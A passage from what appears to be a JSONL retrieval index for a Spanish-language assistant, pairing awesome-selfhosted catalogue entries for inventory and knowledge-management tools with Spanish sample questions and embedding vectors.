-0.0524, -0.02182, -0.00568, 0.03243, 0.03784, 0.02743]} -{"tipo": "pregunta", "herramienta": "Inventory Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Inventory Management", "tema": "inventory management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Inventory Management: Cannery β€” Firearm and ammunition tracker app [AGPL-3.0, Docker]. DVinyl β€” Modern collection manager for physical media (vinyls, CDs, cassettes, books, movies, and video games) [⚠, MIT, Nodejs/Docker]. HomeBox (SysAdminsMedia) β€” Inventory and organization system built for the home user [AGPL-3.0, Docker/Go]. Inventaire β€” Collaborative resources mapper project, while yet only focused on exploring books mapping with wikidata and ISBNs [AGPL-3.0, Nodejs]. Inventree β€” Inventory management system which provides intuitive parts management and stock control [MIT, Python]. Open QuarterMaster β€” Powerful inventory management system, designed to be flexible and scalable [GPL-3.0, deb/Docker]. Part-DB β€” Inventory management system for your electronic components [AGPL-3.0, Docker/PHP/Nodejs]. Shelf β€” Asset and equipment tracking software used by teams who value clarity. Shelf is an asset database and QR asset label generator that lets you create, manage and overview your assets across locations. Unlimited assets, free forever [AGPL-3.0, Nodejs].", "indexar": "cual es una alternativa libre para gestionar el inventario de un taller o almacΓ©n?", "v": [0.0718, -0.02098, -0.13654, -0.14513, -0.11439, 0.0141, 0.00697, 0.05311, -0.17663, -0.01645, -0.13607, -0.21759, -0.02056, 0.09118, 0.11337, 0.09504, 0.01022, -0.27635, 0.1527, 0.09342, -0.07431, 0.15755, -0.10735, -0.016, -0.08611, -0.13395, -0.01939, -0.11547, -0.16632, 0.11574, -0.00394, -0.08208, 0.11444, -0.123, 0.1056, -0.08463, 0.05214, 0.07683, 0.05156, -0.04547, -0.00906, 0.02472, -0.08597, 0.0473, 0.01295, -0.118, 0.06075, -0.00026, -0.01667, 0.10672, -0.05674, -0.05336, 0.00876, 0.04177, 0.10364, -0.01178, 0.06884, -0.02326, 0.13849, -0.0047, -0.00056, -0.02006, -0.03798, 0.03101, -0.05131, 0.01548, -0.10086, 0.02357, -0.02548, 0.08097, -0.04833, -0.00369, -0.00999, -0.00343, -0.11042, -0.03411, -0.00182, 0.03787, -0.02746, 0.00874, 0.03595, -0.09896, 0.0541, 0.02244, -0.01097, -0.11099, -0.00423, 0.00097, 0.00545, 0.00371, 7e-05, -0.0685, -0.10918, -0.01822, 0.02736, -0.02228, -0.0092, 0.05055, -0.03151, 0.07243, 0.06239, -0.02334, -0.06228, 0.02794, 0.05955, 0.09158, -0.02523, 0.01548, -0.09085, 0.01055, -0.01724, 0.07201, -0.02913, 0.04154, -0.01115, 0.04817, -0.00391, 0.02798, -0.01571, 0.02714, -0.0176, 0.03259, -0.0163, -0.06146, 0.05042, -0.01252, 0.06309, 0.08418, -0.01058, -0.02669, -0.0328, 0.01225, -0.00539, -0.07587, -0.055, -0.08241, -0.00716, -0.04389, -0.01678, -0.01042, -0.0915, 0.02329, 0.01527, -0.06132, 0.02884, -0.06702, 0.02499, -0.03567, 0.01997, -0.02054, -0.0089, -0.03808, 0.0919, 0.09212, 0.0203, 0.00429, -0.04572, -0.04393, -0.03392, 0.01394, 0.00977, 0.01063, -0.00231, 0.01723, -0.0533, -0.0054, 0.06447, 0.03759, -0.06512, 0.01831, 0.02837, 0.00043, 0.07824, 0.03834, 0.01627, -0.04073, -0.01538, -0.15933, 0.09264, -0.00806, 0.08265, -0.01509, -0.03599, 0.03385, -0.03252, -0.09585, -0.05531, 0.05751, 0.03082, 0.04049, -0.0172, -0.01735, -0.05356, -0.09777, 0.01281, 0.06529, 0.07442, 0.00327, -0.0204, 0.02867, -0.00548, -0.0325, 0.0283, -0.03844, -0.02485, 0.01069, -0.08262, -0.00092, 0.04562, -0.01977, 0.01162, 0.00354, 0.08821, -0.03204, -0.03408, 0.00648, -0.09211, 0.00905, 0.03088, -0.05492, 0.00872, 0.04746, 0.04286, -0.02369, -0.05798, 0.01794, 0.00131, 0.05735, 0.00732, 0.06957, -0.03077, 0.02899, 0.02031, 0.05609, 0.03052, -0.02832, 0.08005, 0.01949, 0.03588, -0.01411, 0.0699, 0.09702, -0.00976, 0.0117, -0.00465, 0.05514, -0.04923, 0.03757, -0.06167, -0.02975, -0.01242, -0.0331, 0.01002, -0.01333, 0.00525, -0.02571]} -{"tipo": "pregunta", "herramienta": "Inventory Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Inventory Management", "tema": "inventory management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Inventory Management: Cannery β€” Firearm and ammunition tracker app [AGPL-3.0, Docker]. DVinyl β€” Modern collection manager for physical media (vinyls, CDs, cassettes, books, movies, and video games) [⚠, MIT, Nodejs/Docker]. HomeBox (SysAdminsMedia) β€” Inventory and organization system built for the home user [AGPL-3.0, Docker/Go]. Inventaire β€” Collaborative resources mapper project, while yet only focused on exploring books mapping with wikidata and ISBNs [AGPL-3.0, Nodejs]. Inventree β€” Inventory management system which provides intuitive parts management and stock control [MIT, Python]. Open QuarterMaster β€” Powerful inventory management system, designed to be flexible and scalable [GPL-3.0, deb/Docker]. Part-DB β€” Inventory management system for your electronic components [AGPL-3.0, Docker/PHP/Nodejs]. Shelf β€” Asset and equipment tracking software used by teams who value clarity. Shelf is an asset database and QR asset label generator that lets you create, manage and overview your assets across locations. Unlimited assets, free forever [AGPL-3.0, Nodejs].", "indexar": "con que programa puedo controlar las existencias y hacer trazabilidad de piezas electrΓ³nicas?", "v": [0.05907, 0.07463, -0.1226, -0.15494, 0.13663, -0.07072, 0.09017, 0.09486, -0.12989, -0.06766, -0.0462, 0.01963, -0.00314, 0.02391, 0.04518, 0.04834, 0.08848, -0.0945, -0.0469, 0.07661, 0.00351, -0.09642, -0.05138, -0.06372, 0.02061, 0.08041, -0.05145, -0.04236, -0.1339, 0.13535, 0.00523, 0.13122, 0.0543, -0.11488, 0.03265, -0.0279, 0.03283, 0.05931, 0.09223, 0.01238, -0.05258, 0.03652, 0.0387, 0.00877, 0.11448, 0.05371, -0.05511, 0.03884, 0.00736, 0.06162, -0.08239, 0.05521, -0.05187, 0.04318, 0.04583, -0.14313, 0.03207, -0.15575, 0.04372, -0.0412, 0.02049, 0.04478, 0.20359, 0.05851, -0.06309, 0.07714, 0.02277, 0.01179, -0.09538, 0.08637, -0.07186, -0.01606, -0.04874, -0.08451, -0.02872, 0.02717, -0.09933, 0.01267, 0.0304, -0.01046, -0.07779, -0.01941, 0.01353, 0.02875, 0.05596, -0.02816, -0.05229, -0.13715, -0.09434, -0.04801, 0.03129, 0.00972, 0.02489, -0.00508, 0.04569, 0.02511, 0.03032, 0.10126, 0.05471, 0.0592, 0.09314, -0.02166, -0.09803, 0.12514, -0.0067, 0.17333, 0.10293, -0.02491, 0.01782, 0.01335, -0.09077, 0.03482, -0.05179, -0.07015, -0.0993, 0.05491, -0.0265, 0.06925, 0.02175, -0.00487, -0.06722, -0.04585, 0.05523, -0.00666, 0.19661, 0.05838, -0.07221, 0.07714, 0.0002, -0.02277, 0.0736, 0.00073, 0.04453, -0.06027, -0.01169, -0.09561, 0.02323, 0.01336, -0.00958, -0.03146, 0.05179, 0.09087, 0.0731, -0.0196, 0.05459, -0.07422, -0.092, -0.01584, -0.00984, 0.11178, 0.06258, 0.09285, 0.01117, 0.07968, 0.0392, 0.02417, 0.02251, 0.02996, -0.00494, 0.06925, 0.0068, 0.10799, -0.08369, -0.03262, 0.07787, 0.01946, -0.02327, 0.06092, 0.02807, 0.02788, -0.0324, 0.01556, 0.01248, -0.05764, 0.00129, -0.06294, -0.00441, -0.05697, 0.05555, -0.11423, -0.09801, 0.04801, 0.03721, 0.01925, -0.00423, 0.00509, -0.03979, 0.04404, 0.04229, -0.02079, 0.04418, 0.0271, -0.04924, 0.01696, 0.05901, -0.00264, 0.04455, 0.05066, -0.00993, -0.01321, -0.04889, 0.00509, 0.00237, -0.03069, 0.04944, 0.08789, 0.02399, 0.03153, 0.04616, 0.0849, 0.01052, -0.00995, 0.01267, -0.03388, -0.04919, -0.02318, -0.00852, 0.03125, 0.04219, 0.01915, 0.06597, -0.00126, 0.08869, 0.06926, 0.06163, -0.06823, 0.01477, 0.04231, 0.063, 0.024, 0.00138, -0.07886, 0.01974, -0.01098, 0.02637, -0.00105, 0.02162, -0.08836, -0.04006, -0.04405, -0.06052, 0.0768, -0.03218, -0.04338, -0.01202, -0.00857, -0.08959, 0.00102, -0.03622, 0.01047, -0.03534, 0.0533, 0.02825, -0.0676, 0.03524, -0.00548]} -{"tipo": "pregunta", "herramienta": "Inventory Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Inventory Management", "tema": "inventory management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Inventory Management: Cannery β€” Firearm and ammunition tracker app [AGPL-3.0, Docker]. DVinyl β€” Modern collection manager for physical media (vinyls, CDs, cassettes, books, movies, and video games) [⚠, MIT, Nodejs/Docker]. HomeBox (SysAdminsMedia) β€” Inventory and organization system built for the home user [AGPL-3.0, Docker/Go]. Inventaire β€” Collaborative resources mapper project, while yet only focused on exploring books mapping with wikidata and ISBNs [AGPL-3.0, Nodejs]. Inventree β€” Inventory management system which provides intuitive parts management and stock control [MIT, Python]. Open QuarterMaster β€” Powerful inventory management system, designed to be flexible and scalable [GPL-3.0, deb/Docker]. Part-DB β€” Inventory management system for your electronic components [AGPL-3.0, Docker/PHP/Nodejs]. Shelf β€” Asset and equipment tracking software used by teams who value clarity. Shelf is an asset database and QR asset label generator that lets you create, manage and overview your assets across locations. Unlimited assets, free forever [AGPL-3.0, Nodejs].", "indexar": "que herramienta sirve para organizar y rastrear activos fΓ­sicos en diferentes ubicaciones?", "v": [0.27249, 0.11198, -0.1424, -0.17382, 0.13233, -0.13566, -0.00342, -0.05068, -0.03933, -0.04734, -0.04566, -0.09299, 0.0081, 0.01841, 0.22014, 0.01902, 0.06362, -0.12533, -0.13417, 0.08792, -0.11259, 0.00367, -0.05449, 0.12483, -0.09139, 0.02301, 0.12469, -0.0499, -0.22484, 0.01705, 0.07681, 0.10628, 0.03519, -0.09059, 0.00631, -0.11997, -0.03544, -0.05312, -0.0966, 0.0114, -0.12502, 0.04448, -0.06943, 0.01397, 0.01727, 0.06894, -0.14044, -0.02069, -0.05355, 0.04741, -8e-05, -0.02497, -0.04024, -0.09629, 0.02232, -0.17179, 0.10714, -0.08668, 0.04403, -0.04582, -0.10899, 0.01782, 0.03818, -0.0005, 0.07458, 0.06294, 0.04988, -0.05185, -0.10897, -0.04609, -0.08877, -0.02456, 0.00701, 0.02217, 0.03841, 0.08374, 0.10044, 0.02911, -0.02067, 0.08029, -0.01209, 0.00112, -0.10105, 0.08662, -0.07168, -0.1308, 0.07393, -0.02953, 0.01636, -0.07018, -0.03739, 0.02816, -0.0097, 0.05841, -0.04124, 0.06165, 0.07667, 0.05138, 0.05714, 0.03046, 0.07072, -0.04512, -0.09841, 0.03157, -0.0375, 0.03954, -0.02099, 0.01972, -0.05818, -0.01585, 0.03204, -0.04864, 0.01439, 0.00111, -0.03316, 0.06207, 0.03194, -0.0525, 0.05693, -0.04569, -0.01628, 0.03513, -0.02012, 0.00332, -0.02838, 0.01242, 0.01209, 0.07306, 0.04586, -0.01242, 0.03674, -0.03448, -0.06296, 0.01285, -0.12726, -0.02668, 0.04295, -0.0534, 0.03146, -0.02391, -0.01094, 0.04513, -0.01563, -0.12673, 0.0187, 0.00944, 0.13613, -0.00069, -0.03343, 0.03684, 0.01888, -0.02865, -0.01119, 0.02238, -0.01805, 0.0215, -0.00206, -0.05265, -0.07939, 0.01939, -0.08882, 0.01679, -0.02473, -0.04908, 0.03975, -0.03791, -0.00446, -0.01787, -0.02741, 0.02846, 0.01389, 0.01869, 0.0308, -0.06387, -0.03296, -0.03957, 0.00359, 0.01633, 0.07998, -0.03945, 0.0231, -0.05409, -0.01614, -0.00297, -0.00072, -0.02498, 0.02685, 0.01393, -0.03299, 0.02323, 0.04477, 0.01637, -0.00803, -0.02927, -0.0007, -0.04183, -0.03392, -0.05749, 0.05082, 0.00101, 0.00933, -0.0854, 8e-05, 0.03734, 0.02333, 0.0556, -0.04695, 0.01342, -0.03241, 0.01331, 0.04763, -0.03277, 0.06207, -0.01417, -0.0663, -0.09909, 0.02403, 0.02278, -0.02621, -0.00393, -0.02438, 0.01791, 0.02899, -0.04236, -0.0012, -0.01752, 0.05344, 0.02572, 0.07095, 0.06901, 0.02444, 0.00262, -0.00567, 0.00454, 0.02542, -0.01716, 0.03935, -0.0593, 0.00393, -0.00457, 0.0058, 0.01443, 0.02737, -0.02369, -0.03029, -0.04271, -0.02608, 0.04482, -0.01493, -0.07706, 0.02236, 0.02762, 0.12401, -0.02395, -0.0141, -0.01169]} -{"tipo": "pregunta", "herramienta": "Inventory Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Inventory Management", "tema": "inventory management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Inventory Management: Spoolman β€” Keep track of your inventory of 3D-printer filament spools [MIT, Docker/Python].", "indexar": "quΓ© programa me sirve para gestionar el inventario de filamentos para impresora 3D?", "v": [0.17494, -0.088, -0.11886, -0.19295, 0.12316, -0.07548, -0.01136, -0.03443, -0.13769, -0.05809, 0.01947, -0.08774, 0.01986, -0.17047, -0.04205, 0.01498, 0.02587, -0.22341, 0.04648, 0.04401, -0.04848, 0.13559, -0.07087, -0.12402, -0.13555, 0.10012, 0.00277, -0.00301, -0.15977, 0.02752, 0.05645, 0.0053, 0.09966, -0.15917, -0.08751, -0.02769, -0.05175, 0.05545, 0.00732, 0.06497, 0.05445, 0.11296, -0.06421, 0.01477, 0.0609, -0.09758, 0.15013, 0.02616, -0.04289, 0.08894, -0.09602, -0.03991, 0.05784, 0.10474, 0.06678, -0.04457, -0.01017, -0.05047, 0.00184, 0.08889, -0.01774, -0.08588, -0.02878, -0.04426, -0.09773, -0.08289, 0.02038, -0.03276, 0.02606, 0.01823, -0.08241, -0.03402, 0.0454, -0.07479, -0.02038, -0.02226, -0.00334, 0.03864, 0.0502, -0.00123, -0.03695, -0.02059, 0.06138, -0.05783, 0.05403, -0.10738, 0.03861, 0.0408, -0.10135, -0.0357, -0.01294, -0.01771, -0.04468, -0.07033, 0.05842, 0.02297, 0.03234, 0.07608, -0.0052, 0.04945, 0.00638, 0.01922, -0.08955, 0.07069, -0.05599, 0.05316, 0.02562, 0.01171, -0.03935, -0.02252, 0.00025, 0.07026, 0.03288, 0.09059, -0.07205, 0.03059, 0.09104, 0.0334, 0.03703, -0.00813, -0.03812, 0.0749, 0.01702, -0.00284, 0.17656, 0.00222, -0.035, 0.10108, -0.10395, 0.0076, -0.04944, -0.00666, -0.02718, -0.07233, -0.05559, -0.08834, -0.03007, -0.03043, -0.02964, -0.04858, -0.02526, 0.04193, -0.01781, 0.04073, -0.01042, -0.07336, 0.06282, -0.00555, 0.01792, 0.04896, -0.02771, -0.04132, 0.06077, 0.04039, -0.02573, 0.00605, 0.09447, 0.00367, -0.07351, -0.03461, -0.07227, -0.00592, -0.02244, 0.0122, 0.04877, 0.00427, -0.03484, 0.04833, 0.03575, 0.07195, -0.02923, -0.06335, 0.02283, -0.04737, 0.02069, 0.02221, 0.01891, -0.05672, 0.02827, 0.05463, -0.05133, 0.05555, 0.06297, 0.02283, -0.0006, -0.03252, -0.04532, 0.08478, 0.04543, -0.01385, 0.08298, 0.02545, -0.06944, -0.07966, 0.09966, -0.05074, 0.06283, -0.01342, 0.03933, -0.08767, 0.01429, 0.05566, 0.03215, -0.02571, 0.02494, 0.09689, -0.03183, 0.01594, 0.02962, -0.01009, -0.00829, 0.05026, 0.03807, 0.00833, 0.05858, -0.00562, -0.03599, 0.00566, 0.04525, 0.01354, 0.09565, -0.02907, 0.00044, 0.00627, 0.00319, -0.10665, 0.04688, -0.05468, 0.06202, -0.01517, -0.01554, 0.08507, 0.04681, 0.03493, -0.04311, -0.0397, 0.05476, 0.02365, 0.026, -0.09761, -0.03053, 0.08453, -0.04653, 0.0195, 0.03925, 0.07273, -0.00701, -0.01182, -0.04667, -0.06142, -0.06435, 0.03211, -0.00216, 0.04302, 0.04196, -0.03698]} -{"tipo": "pregunta", "herramienta": "Inventory Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Inventory Management", "tema": "inventory management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Inventory Management: Spoolman β€” Keep track of your inventory of 3D-printer filament spools [MIT, Docker/Python].", "indexar": "con quΓ© puedo controlar las bobinas de plΓ‘stico que tengo en casa?", "v": [0.02071, 0.02237, -0.13589, 0.07233, -0.06688, -0.08421, 0.04309, 0.01635, -0.07014, -0.17363, -0.06636, 0.07475, 0.05597, 0.00394, -0.02113, -0.08743, -0.05845, -0.11385, 0.0108, -0.00433, -0.00906, -0.12553, -0.1285, 0.11931, 0.12458, 0.10264, 0.08847, 0.01366, -0.17778, 0.08174, 0.00456, -0.07235, 0.09174, 0.03993, -0.08119, 0.09914, -0.04026, -0.01326, 0.1442, 0.11446, 0.04511, 0.00771, -0.06796, -0.03259, 0.06186, 0.04203, 0.0457, -0.03399, -0.11705, 0.04316, -0.1853, -0.00176, 0.05293, 0.06988, 0.00656, -0.12082, -0.00992, -0.15221, 0.08472, -0.05126, 0.04489, -0.01276, 0.14669, 0.14978, -0.09188, -0.02605, -0.02278, -0.00391, -0.01136, -0.03201, 0.04577, -0.0879, 0.02688, -0.02693, 0.04816, 0.02538, -0.03671, 0.00842, -0.0122, -0.05049, 0.02688, -0.04815, -0.08731, -0.00857, 0.1469, -0.00278, -0.08682, -0.08103, -0.02243, -0.14414, -0.04161, -0.05588, -0.0151, 0.07364, -0.00106, -0.01234, -0.06783, 0.10476, -0.04284, 0.05149, 0.05699, -0.03614, -0.03249, 0.12153, 0.01864, 0.01374, -0.0345, -0.03286, -0.0546, -0.05398, -0.05921, 0.18859, -0.04384, -0.03047, 0.00632, -0.01379, -0.02442, -0.02833, -0.02044, -0.04899, -0.0597, -0.01468, 0.10728, 0.00275, 0.07001, -0.00977, 0.0681, -0.02685, -0.04454, 0.04102, -0.02865, 0.05536, 0.0471, -0.05446, 0.0693, 0.03183, -0.02459, -0.05512, -0.02795, 0.0496, -0.04363, 0.06476, 0.05816, -0.04039, 0.02481, -0.10298, -0.10211, 0.09791, -0.06064, 0.04186, -0.02265, 0.03596, 0.05212, 0.04862, 0.09148, 0.08183, -0.03477, -0.02323, 0.04029, -0.08204, -0.08407, 0.06685, -0.09455, 0.02429, 0.01428, 0.06854, 0.01805, 0.01044, -0.08632, 0.00455, -0.07939, 0.01058, 0.01788, 0.00359, -0.01245, -0.09227, 0.03382, -0.02834, -0.04423, -0.11146, -0.04537, 0.0902, -0.06158, 0.01898, -0.0413, 0.00459, -0.02265, 0.05888, 0.05418, 0.01501, 0.02024, -0.05648, 0.00841, -0.00336, -0.00146, -0.03124, 0.03498, 0.03429, 0.0305, -0.00211, 0.00825, 0.01802, 0.12372, 0.02818, 0.06712, 0.07334, -0.03589, -0.00258, 0.02149, 0.02966, 0.04691, -0.00564, 0.04962, 0.05227, -0.00371, 0.06894, -0.0188, 0.00493, 0.02766, 0.03398, 0.13375, -0.00042, 0.01316, -0.03125, -0.00433, -0.01189, -0.02219, -0.03034, 0.05638, 0.08529, -0.01421, -0.01715, 0.02455, 0.05592, 0.01976, 0.01075, -0.01222, -0.04647, 0.0325, 0.02043, -0.03983, 0.03949, 0.00284, 0.03609, -0.04352, -0.00857, -0.0875, 0.0395, -0.02684, -0.02335, -0.01614, 0.01075, 0.00531, 0.00809, 0.00619, 0.05684]} -{"tipo": "pregunta", "herramienta": "Inventory Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Inventory Management", "tema": "inventory management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Inventory Management: Spoolman β€” Keep track of your inventory of 3D-printer filament spools [MIT, Docker/Python].", "indexar": "hay alguna herramienta libre para llevar un registro de mis rollos de filamento?", "v": [0.098, 0.05298, -0.15887, -0.18105, -0.01838, -0.10693, -0.09731, 0.02959, -0.07234, -0.11146, -0.04068, -0.14571, 0.13132, -0.04559, 0.23797, 0.03787, -0.02952, -0.09686, -0.08667, -0.05159, -0.15467, 0.01726, -0.16263, -0.03863, -0.04437, -0.02002, 0.07903, -0.03271, -0.21045, 0.14346, 0.06814, -0.01711, 0.01895, -0.06739, -0.07036, -0.06175, 0.05249, 0.03875, 0.01419, 0.0556, -0.02848, 0.0424, -0.08208, 0.14372, -0.05541, -0.06992, -0.02364, 0.02346, -0.03161, 0.15993, 0.10096, -0.17496, -0.03886, 0.01528, 0.05782, -0.09671, 0.11797, -0.09065, 0.00949, -0.0161, -0.05788, 0.00778, -0.0038, -0.03041, -0.07003, -0.11858, 0.0355, -0.07691, -0.0205, 0.00305, 0.0891, -0.02071, 0.08599, -0.04447, -0.062, 0.02055, 0.02916, -0.0561, -0.02284, 0.11074, 0.04019, -0.11119, 0.06036, -0.00388, -0.05702, -0.11052, 0.09482, -0.03243, 0.02989, 0.0009, 0.09142, 0.09639, -0.06578, -0.00946, 0.07455, 0.03881, -0.02247, -0.00315, 0.02413, 0.02439, 0.1095, 0.02944, -0.00822, 0.00051, -0.03739, 0.00717, -0.01759, 0.01047, 0.00134, -0.02069, 0.00122, 0.08192, 0.05755, 0.0799, -0.0432, 0.09236, 0.02134, 0.00378, 0.02326, -0.01781, 0.07685, -0.01233, -0.02937, -0.10154, 0.03273, -0.00665, -0.15986, 0.0944, -0.05668, -0.00745, 0.00675, -0.03339, -0.18199, -0.00635, 0.012, -0.01765, 0.0492, -0.03209, 0.02283, -0.04851, 0.00127, 0.01215, -0.08882, -0.02318, -0.00359, -0.04576, -0.03338, -0.0437, -0.07334, -0.07354, -0.00569, -0.03283, 0.0124, 0.04774, -0.01444, 0.08259, -0.01388, 0.02828, -0.03558, -0.02775, -0.05005, -0.04126, 0.00907, -0.00415, 0.04402, 0.00267, 0.04451, 0.05891, 0.00148, 0.0181, -0.01267, -0.0064, 0.12622, -0.01094, 0.02137, -0.03668, -0.02662, -0.0021, -0.0129, -0.05352, -0.00283, 0.07325, 0.02783, -0.02614, 0.02159, -0.03056, 0.00636, -0.00113, 0.0629, 0.07317, 0.07426, 0.0105, -0.01973, -0.05796, 0.02101, 0.04022, 0.02658, -0.0269, 0.09002, -0.03404, -0.04139, -0.01739, -0.04045, -0.05058, -0.0232, 0.09055, -0.07383, -0.02261, 0.03191, 0.05282, 0.03259, 0.00306, 0.01537, -0.01638, 0.0036, 0.03966, -0.0147, 0.01182, -0.01197, -0.00312, 0.09627, 0.01284, 0.04214, 0.01743, -0.02321, 0.02711, 0.0247, 0.01195, 0.01022, -0.01166, 0.02362, 0.02555, 0.01057, -0.02616, 0.00259, -0.01361, 0.03988, 0.03017, -0.04686, -0.01934, -0.00881, 0.0788, -0.03293, -0.00482, 0.00166, -0.01566, 0.0051, 0.01428, 0.00581, -0.07881, -0.058, -0.01796, 0.07538, -0.04547, 0.0154, -0.0297]} -{"tipo": "pregunta", "herramienta": "Knowledge Management Tools", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Knowledge Management Tools", "tema": "knowledge management tools", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Knowledge Management Tools: AFFiNE Community Edition β€” Next-gen knowledge base that brings planning, sorting and creating all together. Privacy first, customizable and ready to use (alternative to Notion and Miro) [MIT/AGPL-3.0, Docker]. Atomic Server β€” Knowledge graph database with documents (similar to Notion), tables, search, and a powerful linked data API. Lightweight, very fast and no runtime dependencies [MIT, Docker/Rust]. Digimindmap β€” Create simple mindmaps (documentation in French) [AGPL-3.0, Nodejs/PHP]. LibreKB β€” Web-based knowledge base solution. A simple web app, it runs on pretty much any web server or hosting provider with PHP and MySQL [GPL-3.0, PHP]. memEx β€” Structured personal knowledge base, inspired by zettlekasten and org-mode [AGPL-3.0, Docker]. SiYuan β€” A privacy-first personal knowledge management software, written in typescript and golang [AGPL-3.0, Docker/Go]. TeamMapper β€” Host and create your own mindmaps. Share your mindmap sessions with your team and collaborate live on mindmaps [MIT, Docker/Nodejs].", "indexar": "que programa hay para tener una base de conocimientos personal y privada?", "v": [-0.09123, 0.09968, -0.05762, -0.18695, 0.03116, -0.10777, 0.01453, -0.03291, -0.10924, -0.1059, 0.07953, 0.08786, 0.03278, -0.06099, -0.07229, -0.0203, 0.11849, -0.1536, 0.07465, 0.1205, 0.02112, 0.05094, -0.03486, 0.02097, -0.11606, 0.00207, 0.08975, -0.11709, -0.02041, 0.08467, 0.05553, 0.018, -0.01321, -0.0642, 0.04524, 0.06337, 0.0509, -0.02391, -0.08806, -0.03651, 0.02136, -0.03909, 0.10811, 0.1943, 0.12948, 0.08157, -0.04663, 0.03249, 0.04109, -0.05794, -0.11369, 0.03665, 0.02484, -0.12097, 0.03774, -0.15941, -0.04164, 0.00723, -0.00658, 0.11896, -0.08256, 0.00708, 0.05527, 0.02511, 0.05563, 0.00517, 0.17021, 0.00653, -0.10326, 0.01711, -0.03729, -0.065, -0.05133, -0.03574, 0.01094, -0.04369, 0.01596, 0.07143, 0.01716, -0.05712, -0.09358, -0.03659, -0.02376, 0.10159, -0.12783, -0.01434, 0.02958, -0.00082, 0.05019, 0.01078, 0.05627, 0.10159, -0.07694, 0.04893, -0.04435, 0.00199, 0.14327, 0.04354, -0.07131, 0.0222, 0.09508, -0.04072, -0.00914, 0.08713, -0.0047, 0.07339, 0.10964, -0.04432, -0.03573, 0.05399, -0.06625, 0.08165, -0.04798, 0.01143, -0.08248, -0.05292, -0.08743, -0.04032, 0.02933, -0.01896, -0.14002, -0.03027, -0.06362, -0.04115, 0.07916, 0.0072, -0.08992, 0.16525, -0.04094, 0.11273, 0.0215, 0.01305, -0.04225, 0.00559, 0.06864, -0.00595, -0.04253, -0.01939, 0.00618, -0.08326, -0.02322, 0.04407, -0.00802, -0.02296, 0.03474, -0.03683, -0.01182, -0.0894, 0.01908, 0.01497, -0.06096, 0.03629, 0.00842, 0.04959, -0.11295, -0.04776, 0.00079, -0.00696, 0.02531, 0.07746, -0.03265, 0.01338, -0.08753, -0.10162, 0.06177, -0.02873, 0.04458, 0.04467, 0.03424, 0.13911, -0.04494, 0.07587, -0.02914, -0.11058, 0.01961, -0.00649, -0.04334, -0.07449, -0.01363, -0.02232, -0.00908, 0.00431, 0.06226, 0.02021, 0.03096, -0.02676, -0.04401, 0.02685, 0.02114, -0.00465, -0.07585, -0.01926, -0.02376, 0.00465, 0.019, 0.00523, -0.07984, 0.01594, 0.06902, -0.0076, -0.02969, 0.01502, 0.00699, 0.03526, 0.02368, 0.01332, -0.00912, -0.07966, 0.04651, 0.0774, 0.02863, 0.00288, 0.04852, -0.03564, -0.01822, 0.07459, 0.00774, 0.07108, 0.06218, 0.03571, 0.00713, 0.04052, 0.0425, 0.00474, -0.00074, -0.06582, 0.00867, 0.04044, 0.04997, 0.05978, 0.02026, -0.03131, -0.01082, -0.07809, 0.07212, 0.00138, -0.04026, -0.03097, -0.02893, -0.10148, 0.02548, 0.0724, 0.00786, -0.06815, 0.00442, -0.0254, -0.05756, 0.03194, 0.03526, -0.02628, -0.05654, 0.0082, 0.01593, -0.01968, 0.05109, 0.02007]} -{"tipo": "pregunta", "herramienta": "Knowledge Management Tools", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Knowledge Management Tools", "tema": "knowledge management tools", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Knowledge Management Tools: AFFiNE Community Edition β€” Next-gen knowledge base that brings planning, sorting and creating all together. Privacy first, customizable and ready to use (alternative to Notion and Miro) [MIT/AGPL-3.0, Docker]. Atomic Server β€” Knowledge graph database with documents (similar to Notion), tables, search, and a powerful linked data API. Lightweight, very fast and no runtime dependencies [MIT, Docker/Rust]. Digimindmap β€” Create simple mindmaps (documentation in French) [AGPL-3.0, Nodejs/PHP]. LibreKB β€” Web-based knowledge base solution. A simple web app, it runs on pretty much any web server or hosting provider with PHP and MySQL [GPL-3.0, PHP]. memEx β€” Structured personal knowledge base, inspired by zettlekasten and org-mode [AGPL-3.0, Docker]. SiYuan β€” A privacy-first personal knowledge management software, written in typescript and golang [AGPL-3.0, Docker/Go]. TeamMapper β€” Host and create your own mindmaps. Share your mindmap sessions with your team and collaborate live on mindmaps [MIT, Docker/Nodejs].", "indexar": "con quΓ© puedo montar mi propia alternativa a Notion sin depender de la nube?", "v": [-0.01796, 0.07568, -0.19978, 0.0804, -0.10366, 0.14638, -0.06895, -0.0171, -0.32152, -0.1174, -0.02487, -0.05385, 0.03285, -0.03061, -0.11298, -0.0126, -0.03472, -0.09454, 0.11164, 0.09675, -0.09417, -0.08976, -0.06448, -0.02681, -0.0421, -0.00031, 0.07693, 0.0708, -0.05232, 0.00251, -0.07987, 0.07635, 0.08229, -0.0073, -0.03139, 0.01656, 0.04602, -0.01706, -0.05388, -0.11475, 0.01172, -0.01547, 0.00837, 0.17371, -0.01289, -0.07296, -0.12914, -0.10386, -0.10288, 0.10868, -0.00449, -0.0049, -0.0113, 0.06724, -0.03659, -0.0388, 0.16029, -0.04454, 0.05703, -0.09246, -0.11822, 0.06539, 0.03373, -0.05596, 0.09543, -0.00324, -0.07925, 0.04005, 